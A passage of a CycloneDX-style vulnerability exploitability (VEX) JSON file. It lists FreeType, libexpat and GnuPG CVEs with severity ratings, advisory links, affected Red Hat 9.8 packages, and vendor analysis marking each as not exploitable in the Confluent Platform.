              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-23865",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "An integer overflow in the tt_var_load_item_variation_store function of the Freetype library in versions 2.13.2 and 2.13.3 may allow for an out of bounds read operation when parsing HVAR/VVAR/MVAR tables in OpenType variable fonts. This issue is fixed in version 2.14.2.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-23865"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/03/8"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9686"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9693"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-23865"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418711"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438542"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448747"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460038"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460039"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460040"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460041"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460042"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460043"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460044"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460045"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66293"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22007"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22016"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22018"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22020"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22021"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23865"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25646"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26740"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34268"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34282"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-9693.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:9686"
        },
        {
          "url": "https://github.com/advisories/GHSA-878v-mxg6-vj8f"
        },
        {
          "url": "https://gitlab.com/freetype/freetype/-/commit/fc85a255849229c024c8e65f536fe1875d84841c"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-23865.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-9693.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23865"
        },
        {
          "url": "https://sourceforge.net/projects/freetype/files/freetype2/2.14.2"
        },
        {
          "url": "https://sourceforge.net/projects/freetype/files/freetype2/2.14.2/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8086-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8327-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8328-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8330-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8331-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8332-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8333-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8334-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8339-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8341-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-23865"
        },
        {
          "url": "https://www.facebook.com/security/advisories/cve-2026-23865"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2026.html#AppendixJAVA"
        }
      ],
      "published": "2026-03-02T17:16:32+00:00",
      "updated": "2026-06-17T10:22:13+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.10.4-10.el9_5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/freetype@2.10.4-10.el9_5?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-24515",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In libexpat before 2.7.4, XML_ExternalEntityParserCreate does not copy unknown encoding handler user data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-24515"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-24515"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1131"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24515"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8022-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8022-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8023-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24515"
        }
      ],
      "published": "2026-01-23T08:16:01+00:00",
      "updated": "2026-06-17T10:23:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-24883",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In GnuPG before 2.5.17, a long signature packet length causes parse_signature to return success with sig->data[] set to a NULL value, leading to a denial of service (application crash).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-24883"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-24883"
        },
        {
          "url": "https://dev.gnupg.org/T8049"
        },
        {
          "url": "https://github.com/advisories/GHSA-7246-cvp4-g68w"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24883"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24883"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/01/27/8"
        }
      ],
      "published": "2026-01-27T19:16:16+00:00",
      "updated": "2026-06-17T10:23:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
